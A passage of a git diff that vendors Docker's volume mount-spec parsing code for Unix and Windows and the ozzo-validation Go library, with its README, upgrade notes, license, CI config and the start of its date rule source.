t.Fatalf("Expected mount copy data to match. Expected: '%v', Actual: '%v'", c.expected.CopyData, mp.CopyData) + } + } +} diff --git a/vendor/github.com/docker/docker/volume/volume_unix.go b/vendor/github.com/docker/docker/volume/volume_unix.go new file mode 100644 index 0000000000..0256ebb2ba --- /dev/null +++ b/vendor/github.com/docker/docker/volume/volume_unix.go @@ -0,0 +1,138 @@ +// +build linux freebsd darwin solaris + +package volume + +import ( + "fmt" + "os" + "path/filepath" + "strings" + + mounttypes "github.com/docker/docker/api/types/mount" +) + +var platformRawValidationOpts = []func(o *validateOpts){ + // need to make sure to not error out if the bind source does not exist on unix + // this is supported for historical reasons, the path will be automatically + // created later. + func(o *validateOpts) { o.skipBindSourceCheck = true }, +} + +// read-write modes +var rwModes = map[string]bool{ + "rw": true, + "ro": true, +} + +// label modes +var labelModes = map[string]bool{ + "Z": true, + "z": true, +} + +// BackwardsCompatible decides whether this mount point can be +// used in old versions of Docker or not. +// Only bind mounts and local volumes can be used in old versions of Docker. +func (m *MountPoint) BackwardsCompatible() bool { + return len(m.Source) > 0 || m.Driver == DefaultDriverName +} + +// HasResource checks whether the given absolute path for a container is in +// this mount point. If the relative path starts with `../` then the resource +// is outside of this mount point, but we can't simply check for this prefix +// because it misses `..` which is also outside of the mount, so check both. +func (m *MountPoint) HasResource(absolutePath string) bool { + relPath, err := filepath.Rel(m.Destination, absolutePath) + return err == nil && relPath != ".." && !strings.HasPrefix(relPath, fmt.Sprintf("..%c", filepath.Separator)) +} + +// IsVolumeNameValid checks a volume name in a platform specific manner. +func IsVolumeNameValid(name string) (bool, error) { + return true, nil +} + +// ValidMountMode will make sure the mount mode is valid. +// returns if it's a valid mount mode or not. +func ValidMountMode(mode string) bool { + if mode == "" { + return true + } + + rwModeCount := 0 + labelModeCount := 0 + propagationModeCount := 0 + copyModeCount := 0 + + for _, o := range strings.Split(mode, ",") { + switch { + case rwModes[o]: + rwModeCount++ + case labelModes[o]: + labelModeCount++ + case propagationModes[mounttypes.Propagation(o)]: + propagationModeCount++ + case copyModeExists(o): + copyModeCount++ + default: + return false + } + } + + // Only one string for each mode is allowed. + if rwModeCount > 1 || labelModeCount > 1 || propagationModeCount > 1 || copyModeCount > 1 { + return false + } + return true +} + +// ReadWrite tells you if a mode string is a valid read-write mode or not. +// If there are no specifications w.r.t read write mode, then by default +// it returns true. +func ReadWrite(mode string) bool { + if !ValidMountMode(mode) { + return false + } + + for _, o := range strings.Split(mode, ",") { + if o == "ro" { + return false + } + } + return true +} + +func validateNotRoot(p string) error { + p = filepath.Clean(convertSlash(p)) + if p == "/" { + return fmt.Errorf("invalid specification: destination can't be '/'") + } + return nil +} + +func validateCopyMode(mode bool) error { + return nil +} + +func convertSlash(p string) string { + return filepath.ToSlash(p) +} + +func splitRawSpec(raw string) ([]string, error) { + if strings.Count(raw, ":") > 2 { + return nil, errInvalidSpec(raw) + } + + arr := strings.SplitN(raw, ":", 3) + if arr[0] == "" { + return nil, errInvalidSpec(raw) + } + return arr, nil +} + +func clean(p string) string { + return filepath.Clean(p) +} + +func validateStat(fi os.FileInfo) error { + return nil +} diff --git a/vendor/github.com/docker/docker/volume/volume_unsupported.go b/vendor/github.com/docker/docker/volume/volume_unsupported.go new file mode 100644 index 0000000000..ff9d6afa27 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/volume_unsupported.go @@ -0,0 +1,16 @@ +// +build !linux + +package volume + +import ( + "fmt" + "runtime" + + mounttypes "github.com/docker/docker/api/types/mount" +) + +// ConvertTmpfsOptions converts *mounttypes.TmpfsOptions to the raw option string +// for mount(2). +func ConvertTmpfsOptions(opt *mounttypes.TmpfsOptions, readOnly bool) (string, error) { + return "", fmt.Errorf("%s does not support tmpfs", runtime.GOOS) +} diff --git a/vendor/github.com/docker/docker/volume/volume_windows.go b/vendor/github.com/docker/docker/volume/volume_windows.go new file mode 100644 index 0000000000..22f6fc7a14 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/volume_windows.go @@ -0,0 +1,201 @@ +package volume + +import ( + "fmt" + "os" + "path/filepath" + "regexp" + "strings" +) + +// read-write modes +var rwModes = map[string]bool{ + "rw": true, +} + +// read-only modes +var roModes = map[string]bool{ + "ro": true, +} + +var platformRawValidationOpts = []func(*validateOpts){ + // filepath.IsAbs is weird on Windows: + // `c:` is not considered an absolute path + // `c:\` is considered an absolute path + // In any case, the regex matching below ensures absolute paths + // TODO: consider this a bug with filepath.IsAbs (?) + func(o *validateOpts) { o.skipAbsolutePathCheck = true }, +} + +const ( + // Spec should be in the format [source:]destination[:mode] + // + // Examples: c:\foo bar:d:rw + // c:\foo:d:\bar + // myname:d: + // d:\ + // + // Explanation of this regex! Thanks @thaJeztah on IRC and gist for help. See + // https://gist.github.com/thaJeztah/6185659e4978789fb2b2. A good place to + // test is https://regex-golang.appspot.com/assets/html/index.html + // + // Useful link for referencing named capturing groups: + // http://stackoverflow.com/questions/20750843/using-named-matches-from-go-regex + // + // There are three match groups: source, destination and mode. + // + + // RXHostDir is the first option of a source + RXHostDir = `[a-z]:\\(?:[^\\/:*?"<>|\r\n]+\\?)*` + // RXName is the second option of a source + RXName = `[^\\/:*?"<>|\r\n]+` + // RXReservedNames are reserved names not possible on Windows + RXReservedNames = `(con)|(prn)|(nul)|(aux)|(com[1-9])|(lpt[1-9])` + + // RXSource is the combined possibilities for a source + RXSource = `((?P((` + RXHostDir + `)|(` + RXName + `))):)?` + + // Source. Can be either a host directory, a name, or omitted: + // HostDir: + // - Essentially using the folder solution from + // https://www.safaribooksonline.com/library/view/regular-expressions-cookbook/9781449327453/ch08s18.html + // but adding case insensitivity. + // - Must be an absolute path such as c:\path + // - Can include spaces such as `c:\program files` + // - And then followed by a colon which is not in the capture group + // - And can be optional + // Name: + // - Must not contain invalid NTFS filename characters (https://msdn.microsoft.com/en-us/library/windows/desktop/aa365247(v=vs.85).aspx) + // - And then followed by a colon which is not in the capture group + // - And can be optional + + // RXDestination is the regex expression for the mount destination + RXDestination = `(?P([a-z]):((?:\\[^\\/:*?"<>\r\n]+)*\\?))` + // Destination (aka container path): + // - Variation on hostdir but can be a drive followed by colon as well + // - If a path, must be absolute. Can include spaces + // - Drive cannot be c: (explicitly checked in code, not RegEx) + + // RXMode is the regex expression for the mode of the mount + // Mode (optional): + // - Hopefully self explanatory in comparison to above regex's. + // - Colon is not in the capture group + RXMode = `(:(?P(?i)ro|rw))?` +) + +// BackwardsCompatible decides whether this mount point can be +// used in old versions of Docker or not. +// Windows volumes are never backwards compatible. +func (m *MountPoint) BackwardsCompatible() bool { + return false +} + +func splitRawSpec(raw string) ([]string, error) { + specExp := regexp.MustCompile(`^` + RXSource + RXDestination + RXMode + `$`) + match := specExp.FindStringSubmatch(strings.ToLower(raw)) + + // Must have something back + if len(match) == 0 { + return nil, errInvalidSpec(raw) + } + + var split []string + matchgroups := make(map[string]string) + // Pull out the sub expressions from the named capture groups + for i, name := range specExp.SubexpNames() { + matchgroups[name] = strings.ToLower(match[i]) + } + if source, exists := matchgroups["source"]; exists { + if source != "" { + split = append(split, source) + } + } + if destination, exists := matchgroups["destination"]; exists { + if destination != "" { + split = append(split, destination) + } + } + if mode, exists := matchgroups["mode"]; exists { + if mode != "" { + split = append(split, mode) + } + } + // Fix #26329. If the destination appears to be a file, and the source is null, + // it may be because we've fallen through the possible naming regex and hit a + // situation where the user intention was to map a file into a container through + // a local volume, but this is not supported by the platform. + if matchgroups["source"] == "" && matchgroups["destination"] != "" { + validName, err := IsVolumeNameValid(matchgroups["destination"]) + if err != nil { + return nil, err + } + if !validName { + if fi, err := os.Stat(matchgroups["destination"]); err == nil { + if !fi.IsDir() { + return nil, fmt.Errorf("file '%s' cannot be mapped. Only directories can be mapped on this platform", matchgroups["destination"]) + } + } + } + } + return split, nil +} + +// IsVolumeNameValid checks a volume name in a platform specific manner. +func IsVolumeNameValid(name string) (bool, error) { + nameExp := regexp.MustCompile(`^` + RXName + `$`) + if !nameExp.MatchString(name) { + return false, nil + } + nameExp = regexp.MustCompile(`^` + RXReservedNames + `$`) + if nameExp.MatchString(name) { + return false, fmt.Errorf("volume name %q cannot be a reserved word for Windows filenames", name) + } + return true, nil +} + +// ValidMountMode will make sure the mount mode is valid. +// returns if it's a valid mount mode or not. +func ValidMountMode(mode string) bool { + if mode == "" { + return true + } + return roModes[strings.ToLower(mode)] || rwModes[strings.ToLower(mode)] +} + +// ReadWrite tells you if a mode string is a valid read-write mode or not. +func ReadWrite(mode string) bool { + return rwModes[strings.ToLower(mode)] || mode == "" +} + +func validateNotRoot(p string) error { + p = strings.ToLower(convertSlash(p)) + if p == "c:" || p == `c:\` { + return fmt.Errorf("destination path cannot be `c:` or `c:\\`: %v", p) + } + return nil +} + +func validateCopyMode(mode bool) error { + if mode { + return fmt.Errorf("Windows does not support copying image path content") + } + return nil +} + +func convertSlash(p string) string { + return filepath.FromSlash(p) +} + +func clean(p string) string { + if match, _ := regexp.MatchString("^[a-z]:$", p); match { + return p + } + return filepath.Clean(p) +} + +func validateStat(fi os.FileInfo) error { + if !fi.IsDir() { + return fmt.Errorf("source path must be a directory") + } + return nil +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/.gitignore b/vendor/github.com/go-ozzo/ozzo-validation/.gitignore new file mode 100644 index 0000000000..daf913b1b3 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/.gitignore @@ -0,0 +1,24 @@ +# Compiled Object files, Static and Dynamic libs (Shared Objects) +*.o +*.a +*.so + +# Folders +_obj +_test + +# Architecture specific extensions/prefixes +*.[568vq] +[568vq].out + +*.cgo1.go +*.cgo2.c +_cgo_defun.c +_cgo_gotypes.go +_cgo_export.* + +_testmain.go + +*.exe +*.test +*.prof diff --git a/vendor/github.com/go-ozzo/ozzo-validation/.travis.yml b/vendor/github.com/go-ozzo/ozzo-validation/.travis.yml new file mode 100644 index 0000000000..aedd4540b4 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/.travis.yml @@ -0,0 +1,16 @@ +language: go + +go: + - 1.6 + - 1.7 + - tip + +install: + - go get golang.org/x/tools/cmd/cover + - go get github.com/mattn/goveralls + - go list -f '{{range .Imports}}{{.}} {{end}}' ./... | xargs go get -v + - go list -f '{{range .TestImports}}{{.}} {{end}}' ./... | xargs go get -v + +script: + - go test -v -covermode=count -coverprofile=coverage.out + - $HOME/gopath/bin/goveralls -coverprofile=coverage.out -service=travis-ci diff --git a/vendor/github.com/go-ozzo/ozzo-validation/LICENSE b/vendor/github.com/go-ozzo/ozzo-validation/LICENSE new file mode 100644 index 0000000000..d235be9cc6 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/LICENSE @@ -0,0 +1,17 @@ +The MIT License (MIT) +Copyright (c) 2016, Qiang Xue + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software +and associated documentation files (the "Software"), to deal in the Software without restriction, +including without limitation the rights to use, copy, modify, merge, publish, distribute, +sublicense, and/or sell copies of the Software, and to permit persons to whom the Software +is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or +substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING +BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND +NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, +DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/vendor/github.com/go-ozzo/ozzo-validation/README.md b/vendor/github.com/go-ozzo/ozzo-validation/README.md new file mode 100644 index 0000000000..1841a7cb49 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/README.md @@ -0,0 +1,530 @@ +# ozzo-validation + +[![GoDoc](https://godoc.org/github.com/go-ozzo/ozzo-validation?status.png)](http://godoc.org/github.com/go-ozzo/ozzo-validation) +[![Build Status](https://travis-ci.org/go-ozzo/ozzo-validation.svg?branch=master)](https://travis-ci.org/go-ozzo/ozzo-validation) +[![Coverage Status](https://coveralls.io/repos/github/go-ozzo/ozzo-validation/badge.svg?branch=master)](https://coveralls.io/github/go-ozzo/ozzo-validation?branch=master) +[![Go Report](https://goreportcard.com/badge/github.com/go-ozzo/ozzo-validation)](https://goreportcard.com/report/github.com/go-ozzo/ozzo-validation) + +## Description + +ozzo-validation is a Go package that provides configurable and extensible data validation capabilities. +It has the following features: + +* use normal programming constructs rather than error-prone struct tags to specify how data should be validated. +* can validate data of different types, e.g., structs, strings, byte slices, slices, maps, arrays. +* can validate custom data types as long as they implement the `Validatable` interface. +* can validate data types that implement the `sql.Valuer` interface (e.g. `sql.NullString`). +* customizable and well-formatted validation errors. +* provide a rich set of validation rules right out of box. +* extremely easy to create and use custom validation rules. + + +## Requirements + +Go 1.6 or above. + + +## Getting Started + +The ozzo-validation package mainly includes a set of validation rules and two validation methods. You use +validation rules to describe how a value should be considered valid, and you call either `validation.Validate()` +or `validation.ValidateStruct()` to validate the value. + + +### Installation + +Run the following command to install the package: + +``` +go get github.com/go-ozzo/ozzo-validation +go get github.com/go-ozzo/ozzo-validation/is +``` + +### Validating a Simple Value + +For a simple value, such as a string or an integer, you may use `validation.Validate()` to validate it. For example, + +```go +package main + +import ( + "fmt" + + "github.com/go-ozzo/ozzo-validation" + "github.com/go-ozzo/ozzo-validation/is" +) + +func main() { + data := "example" + err := validation.Validate(data, + validation.Required, // not empty + validation.Length(5, 100), // length between 5 and 100 + is.URL, // is a valid URL + ) + fmt.Println(err) + // Output: + // must be a valid URL +} +``` + +The method `validation.Validate()` will run through the rules in the order that they are listed. If a rule fails +the validation, the method will return the corresponding error and skip the rest of the rules. The method will +return nil if the value passes all validation rules. + + +### Validating a Struct + +For a struct value, you usually want to check if its fields are valid. For example, in a RESTful application, you +may unmarshal the request payload into a struct and then validate the struct fields. If one or multiple fields +are invalid, you may want to get an error describing which fields are invalid. You can use `validation.ValidateStruct()` +to achieve this purpose. A single struct can have rules for multiple fields, and a field can be associated with multiple +rules. For example, + +```go +package main + +import ( + "fmt" + "regexp" + + "github.com/go-ozzo/ozzo-validation" + "github.com/go-ozzo/ozzo-validation/is" +) + +type Address struct { + Street string + City string + State string + Zip string +} + +func (a Address) Validate() error { + return validation.ValidateStruct(&a, + // Street cannot be empty, and the length must between 5 and 50 + validation.Field(&a.Street, validation.Required, validation.Length(5, 50)), + // City cannot be empty, and the length must between 5 and 50 + validation.Field(&a.City, validation.Required, validation.Length(5, 50)), + // State cannot be empty, and must be a string consisting of two letters in upper case + validation.Field(&a.State, validation.Required, validation.Match(regexp.MustCompile("^[A-Z]{2}$"))), + // State cannot be empty, and must be a string consisting of five digits + validation.Field(&a.Zip, validation.Required, validation.Match(regexp.MustCompile("^[0-9]{5}$"))), + ) +} + +func main() { + a := Address{ + Street: "123", + City: "Unknown", + State: "Virginia", + Zip: "12345", + } + + err := a.Validate() + fmt.Println(err) + // Output: + // Street: the length must be between 5 and 50; State: must be in a valid format. +} +``` + +Note that when calling `validation.ValidateStruct` to validate a struct, you should pass to the method a pointer +to the struct instead of the struct itself. Similarly, when calling `validation.Field` to specify the rules +for a struct field, you should use a pointer to the struct field. + +When the struct validation is performed, the fields are validated in the order they are specified in `ValidateStruct`. +And when each field is validated, its rules are also evaluated in the order they are associated with the field. +If a rule fails, an error is recorded for that field, and the validation will continue with the next field. + + +### Validation Errors + +The `validation.ValidateStruct` method returns validation errors found in struct fields in terms of `validation.Errors` +which is a map of fields and their corresponding errors. Nil is returned if validation passes. + +By default, `validation.Errors` uses the struct tags named `json` to determine what names should be used to +represent the invalid fields. The type also implements the `json.Marshaler` interface so that it can be marshaled +into a proper JSON object. For example, + +```go +type Address struct { + Street string `json:"street"` + City string `json:"city"` + State string `json:"state"` + Zip string `json:"zip"` +} + +// ...perform validation here... + +err := a.Validate() +b, _ := json.Marshal(err) +fmt.Println(string(b)) +// Output: +// {"street":"the length must be between 5 and 50","state":"must be in a valid format"} +``` + +You may modify `validation.ErrorTag` to use a different struct tag name. + +If you do not like the magic that `ValidateStruct` determines error keys based on struct field names or corresponding +tag values, you may use the following alternative approach: + +```go +c := Customer{ + Name: "Qiang Xue", + Email: "q", + Address: Address{ + State: "Virginia", + }, +} + +err := validation.Errors{ + "name": validation.Validate(c.Name, validation.Required, validation.Length(5, 20)), + "email": validation.Validate(c.Name, validation.Required, is.Email), + "zip": validation.Validate(c.Address.Zip, validation.Required, validation.Match(regexp.MustCompile("^[0-9]{5}$"))), +}.Filter() +fmt.Println(err) +// Output: +// email: must be a valid email address; zip: cannot be blank. +``` + +In the above example, we build a `validation.Errors` by a list of names and the corresponding validation results. +At the end we call `Errors.Filter()` to remove from `Errors` all nils which correspond to those successful validation +results. The method will return nil if `Errors` is empty. + +The above approach is very flexible as it allows you to freely build up your validation error structure. You can use +it to validate both struct and non-struct values. Compared to using `ValidateStruct` to validate a struct, +it has the drawback that you have to redundantly specify the error keys while `ValidateStruct` can automatically +find them out. + + +### Internal Errors + +Internal errors are different from validation errors in that internal errors are caused by malfunctioning code (e.g. +a validator making a remote call to validate some data when the remote service is down) rather +than the data being validated. When an internal error happens during data validation, you may allow the user to resubmit +the same data to perform validation again, hoping the program resumes functioning. On the other hand, if data validation +fails due to data error, the user should generally not resubmit the same data again. + +To differentiate internal errors from validation errors, when an internal error occurs in a validator, wrap it +into `validation.InternalError` by calling `validation.NewInternalError()`. The user of the validator can then check +if a returned error is an internal error or not. For example, + +```go +if err := a.Validate(); err != nil { + if e, ok := err.(validation.InternalError); ok { + // an internal error happened + fmt.Println(e.InternalError()) + } +} +``` + + +## Validatable Types + +A type is validatable if it implements the `validation.Validatable` interface. + +When `validation.Validate` is used to validate a validatable value, if it does not find any error with the +given validation rules, it will further call the value's `Validate()` method. + +Similarly, when `validation.ValidateStruct` is validating a struct field whose type is validatable, it will call +the field's `Validate` method after it passes the listed rules. + +In the following example, the `Address` field of `Customer` is validatable because `Address` implements +`validation.Validatable`. Therefore, when validating a `Customer` struct with `validation.ValidateStruct`, +validation will "dive" into the `Address` field. + +```go +type Customer struct { + Name string + Gender string + Email string + Address Address +} + +func (c Customer) Validate() error { + return validation.ValidateStruct(&c, + // Name cannot be empty, and the length must be between 5 and 20. + validation.Field(&c.Name, validation.Required, validation.Length(5, 20)), + // Gender is optional, and should be either "Female" or "Male". + validation.Field(&c.Gender, validation.In("Female", "Male")), + // Email cannot be empty and should be in a valid email format. + validation.Field(&c.Email, validation.Required, is.Email), + // Validate Address using its own validation rules + validation.Field(&c.Address), + ) +} + +c := Customer{ + Name: "Qiang Xue", + Email: "q", + Address: Address{ + Street: "123 Main Street", + City: "Unknown", + State: "Virginia", + Zip: "12345", + }, +} + +err := c.Validate() +fmt.Println(err) +// Output: +// Address: (State: must be in a valid format.); Email: must be a valid email address. +``` + +Sometimes, you may want to skip the invocation of a type's `Validate` method. To do so, simply associate +a `validation.Skip` rule with the value being validated. + + +### Maps/Slices/Arrays of Validatables + +When validating a map, slice, or array, whose element type implements the `validation.Validatable` interface, +the `validation.Validate` method will call the `Validate` method of every non-nil element. +The validation errors of the elements will be returned as `validation.Errors` which maps the keys of the +invalid elements to their corresponding validation errors. For example, + +```go +addresses := []Address{ + Address{State: "MD", Zip: "12345"}, + Address{Street: "123 Main St", City: "Vienna", State: "VA", Zip: "12345"}, + Address{City: "Unknown", State: "NC", Zip: "123"}, +} +err := validation.Validate(addresses) +fmt.Println(err) +// Output: +// 0: (City: cannot be blank; Street: cannot be blank.); 2: (Street: cannot be blank; Zip: must be in a valid format.). +``` + +When using `validation.ValidateStruct` to validate a struct, the above validation procedure also applies to those struct +fields which are map/slices/arrays of validatables. + + +### Pointers + +When a value being validated is a pointer, most validation rules will validate the actual value pointed to by the pointer. +If the pointer is nil, these rules will skip the validation. + +An exception is the `validation.Required` and `validation.NotNil` rules. When a pointer is nil, they +will report a validation error. + + +### Types Implementing `sql.Valuer` + +If a data type implements the `sql.Valuer` interface (e.g. `sql.NullString`), the built-in validation rules will handle +it properly. In particular, when a rule is validating such data, it will call the `Value()` method and validate +the returned value instead. + + +### Required vs. Not Nil + +When validating input values, there are two different scenarios about checking if input values are provided or not. + +In the first scenario, an input value is considered missing if it is not entered or it is entered as a zero value +(e.g. an empty string, a zero integer). You can use the `validation.Required` rule in this case. + +In the second scenario, an input value is considered missing only if it is not entered. A pointer field is usually +used in this case so that you can detect if a value is entered or not by checking if the pointer is nil or not. +You can use the `validation.NotNil` rule to ensure a value is entered (even if it is a zero value). + + +### Embedded Structs + +The `validation.ValidateStruct` method will properly validate a struct that contains embedded structs. In particular, +the fields of an embedded struct are treated as if they belong directly to the containing struct. For example, + +```go +type Employee struct { + Name string +} + +func () + +type Manager struct { + Employee + Level int +} + +m := Manager{} +err := validation.ValidateStruct(&m, + validation.Field(&m.Name, validation.Required), + validation.Field(&m.Level, validation.Required), +) +fmt.Println(err) +// Output: +// Level: cannot be blank; Name: cannot be blank. +``` + +In the above code, we use `&m.Name` to specify the validation of the `Name` field of the embedded struct `Employee`. +And the validation error uses `Name` as the key for the error associated with the `Name` field as if `Name` a field +directly belonging to `Manager`. + +If `Employee` implements the `validation.Validatable` interface, we can also use the following code to validate +`Manager`, which generates the same validation result: + +```go +func (e Employee) Validate() error { + return validation.ValidateStruct(&e, + validation.Field(&e.Name, validation.Required), + ) +} + +err := validation.ValidateStruct(&m, + validation.Field(&m.Employee), + validation.Field(&m.Level, validation.Required), +) +fmt.Println(err) +// Output: +// Level: cannot be blank; Name: cannot be blank. +``` + + +## Built-in Validation Rules + +The following rules are provided in the `validation` package: + +* `In(...interface{})`: checks if a value can be found in the given list of values. +* `Length(min, max int)`: checks if the length of a value is within the specified range. + This rule should only be used for validating strings, slices, maps, and arrays. +* `RuneLength(min, max int)`: checks if the length of a string is within the specified range. + This rule is similar as `Length` except that when the value being validated is a string, it checks + its rune length instead of byte length. +* `Min(min interface{})` and `Max(max interface{})`: checks if a value is within the specified range. + These two rules should only be used for validating int, uint, float and time.Time types. +* `Match(*regexp.Regexp)`: checks if a value matches the specified regular expression. + This rule should only be used for strings and byte slices. +* `Date(layout string)`: checks if a string value is a date whose format is specified by the layout. + By calling `Min()` and/or `Max()`, you can check additionally if the date is within the specified range. +* `Required`: checks if a value is not empty (neither nil nor zero). +* `NotNil`: checks if a pointer value is not nil. Non-pointer values are considered valid. +* `NilOrNotEmpty`: checks if a value is a nil pointer or a non-empty value. This differs from `Required` in that it treats a nil pointer as valid. +* `Skip`: this is a special rule used to indicate that all rules following it should be skipped (including the nested ones). + +The `is` sub-package provides a list of commonly used string validation rules that can be used to check if the format +of a value satisfies certain requirements. Note that these rules only handle strings and byte slices and if a string + or byte slice is empty, it is considered valid. You may use a `Required` rule to ensure a value is not empty. +Below is the whole list of the rules provided by the `is` package: + +* `Email`: validates if a string is an email or not +* `URL`: validates if a string is a valid URL +* `RequestURL`: validates if a string is a valid request URL +* `RequestURI`: validates if a string is a valid request URI +* `Alpha`: validates if a string contains English letters only (a-zA-Z) +* `Digit`: validates if a string contains digits only (0-9) +* `Alphanumeric`: validates if a string contains English letters and digits only (a-zA-Z0-9) +* `UTFLetter`: validates if a string contains unicode letters only +* `UTFDigit`: validates if a string contains unicode decimal digits only +* `UTFLetterNumeric`: validates if a string contains unicode letters and numbers only +* `UTFNumeric`: validates if a string contains unicode number characters (category N) only +* `LowerCase`: validates if a string contains lower case unicode letters only +* `UpperCase`: validates if a string contains upper case unicode letters only +* `Hexadecimal`: validates if a string is a valid hexadecimal number +* `HexColor`: validates if a string is a valid hexadecimal color code +* `RGBColor`: validates if a string is a valid RGB color in the form of rgb(R, G, B) +* `Int`: validates if a string is a valid integer number +* `Float`: validates if a string is a floating point number +* `UUIDv3`: validates if a string is a valid version 3 UUID +* `UUIDv4`: validates if a string is a valid version 4 UUID +* `UUIDv5`: validates if a string is a valid version 5 UUID +* `UUID`: validates if a string is a valid UUID +* `CreditCard`: validates if a string is a valid credit card number +* `ISBN10`: validates if a string is an ISBN version 10 +* `ISBN13`: validates if a string is an ISBN version 13 +* `ISBN`: validates if a string is an ISBN (either version 10 or 13) +* `JSON`: validates if a string is in valid JSON format +* `ASCII`: validates if a string contains ASCII characters only +* `PrintableASCII`: validates if a string contains printable ASCII characters only +* `Multibyte`: validates if a string contains multibyte characters +* `FullWidth`: validates if a string contains full-width characters +* `HalfWidth`: validates if a string contains half-width characters +* `VariableWidth`: validates if a string contains both full-width and half-width characters +* `Base64`: validates if a string is encoded in Base64 +* `DataURI`: validates if a string is a valid base64-encoded data URI +* `CountryCode2`: validates if a string is a valid ISO3166 Alpha 2 country code +* `CountryCode3`: validates if a string is a valid ISO3166 Alpha 3 country code +* `DialString`: validates if a string is a valid dial string that can be passed to Dial() +* `MAC`: validates if a string is a MAC address +* `IP`: validates if a string is a valid IP address (either version 4 or 6) +* `IPv4`: validates if a string is a valid version 4 IP address +* `IPv6`: validates if a string is a valid version 6 IP address +* `DNSName`: validates if a string is valid DNS name +* `Host`: validates if a string is a valid IP (both v4 and v6) or a valid DNS name +* `Port`: validates if a string is a valid port number +* `MongoID`: validates if a string is a valid Mongo ID +* `Latitude`: validates if a string is a valid latitude +* `Longitude`: validates if a string is a valid longitude +* `SSN`: validates if a string is a social security number (SSN) +* `Semver`: validates if a string is a valid semantic version + +### Customizing Error Messages + +All built-in validation rules allow you to customize error messages. To do so, simply call the `Error()` method +of the rules. For example, + +```go +data := "2123" +err := validation.Validate(data, + validation.Required.Error("is required"), + validation.Match(regexp.MustCompile("^[0-9]{5}$")).Error("must be a string with five digits"), +) +fmt.Println(err) +// Output: +// must be a string with five digits +``` + + +## Creating Custom Rules + +Creating a custom rule is as simple as implementing the `validation.Rule` interface. The interface contains a single +method as shown below, which should validate the value and return the validation error, if any: + +```go +// Validate validates a value and returns an error if validation fails. +Validate(value interface{}) error +``` + +If you already have a function with the same signature as shown above, you can call `validation.By()` to turn +it into a validation rule. For example, + +```go +func checkAbc(value interface{}) error { + s, _ := value.(string) + if s != "abc" { + return errors.New("must be abc") + } + return nil +} + +err := validation.Validate("xyz", validation.By(checkAbc)) +fmt.Println(err) +// Output: must be abc +``` + + +### Rule Groups + +When a combination of several rules are used in multiple places, you may use the following trick to create a +rule group so that your code is more maintainable. + +```go +var NameRule = []validation.Rule{ + validation.Required, + validation.Length(5, 20), +} + +type User struct { + FirstName string + LastName string +} + +func (u User) Validate() error { + return validation.ValidateStruct(&u, + validation.Field(&u.FirstName, NameRule...), + validation.Field(&u.LastName, NameRule...), + ) +} +``` + +In the above example, we create a rule group `NameRule` which consists of two validation rules. We then use this rule +group to validate both `FirstName` and `LastName`. + + +## Credits + +The `is` sub-package wraps the excellent validators provided by the [govalidator](https://github.com/asaskevich/govalidator) package. diff --git a/vendor/github.com/go-ozzo/ozzo-validation/UPGRADE.md b/vendor/github.com/go-ozzo/ozzo-validation/UPGRADE.md new file mode 100644 index 0000000000..8f11d03eaa --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/UPGRADE.md @@ -0,0 +1,46 @@ +# Upgrade Instructions + +## Upgrade from 2.x to 3.x + +* Instead of using `StructRules` to define struct validation rules, use `ValidateStruct()` to declare and perform + struct validation. The following code snippet shows how to modify your code: +```go +// 2.x usage +err := validation.StructRules{}. + Add("Street", validation.Required, validation.Length(5, 50)). + Add("City", validation.Required, validation.Length(5, 50)). + Add("State", validation.Required, validation.Match(regexp.MustCompile("^[A-Z]{2}$"))). + Add("Zip", validation.Required, validation.Match(regexp.MustCompile("^[0-9]{5}$"))). + Validate(a) + +// 3.x usage +err := validation.ValidateStruct(&a, + validation.Field(&a.Street, validation.Required, validation.Length(5, 50)), + validation.Field(&a.City, validation.Required, validation.Length(5, 50)), + validation.Field(&a.State, validation.Required, validation.Match(regexp.MustCompile("^[A-Z]{2}$"))), + validation.Field(&a.Zip, validation.Required, validation.Match(regexp.MustCompile("^[0-9]{5}$"))), +) +``` + +* Instead of using `Rules` to declare a rule list and use it to validate a value, call `Validate()` with the rules directly. +```go +data := "example" + +// 2.x usage +rules := validation.Rules{ + validation.Required, + validation.Length(5, 100), + is.URL, +} +err := rules.Validate(data) + +// 3.x usage +err := validation.Validate(data, + validation.Required, + validation.Length(5, 100), + is.URL, +) +``` + +* The default struct tags used for determining error keys is changed from `validation` to `json`. You may modify + `validation.ErrorTag` to change it back. \ No newline at end of file diff --git a/vendor/github.com/go-ozzo/ozzo-validation/date.go b/vendor/github.com/go-ozzo/ozzo-validation/date.go new file mode 100644 index 0000000000..2dc3d583ad --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/date.go @@ -0,0 +1,84 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import ( + "errors" + "time" +) + +type dateRule struct { + layout string + min, max time.Time + message string + rangeMessage string +} + +// Date returns a validation rule that checks if a string value is in a format that can be parsed into a date. +// The format of the date should be specified as the layout parameter which accepts the same value as that for time.Parse. +// For example, +// validation.Date(time.ANSIC) +// validation.Date("02 Jan 06 15:04 MST") +// validation.Date("2006-01-02") +// +// By calling Min() and/or Max(), you can let the Date rule to check if a parsed date value is within +// the specified date range. +// +// An empty value is considered valid. Use the Required rule to make sure a value is not empty. +func Date(layout string) *dateRule { + return &dateRule{ + layout: layout, + message: "must be a valid date", + rangeMessage: "the data is out of range", + } +} + +// Error sets the error message that is used when the value being validated is not a 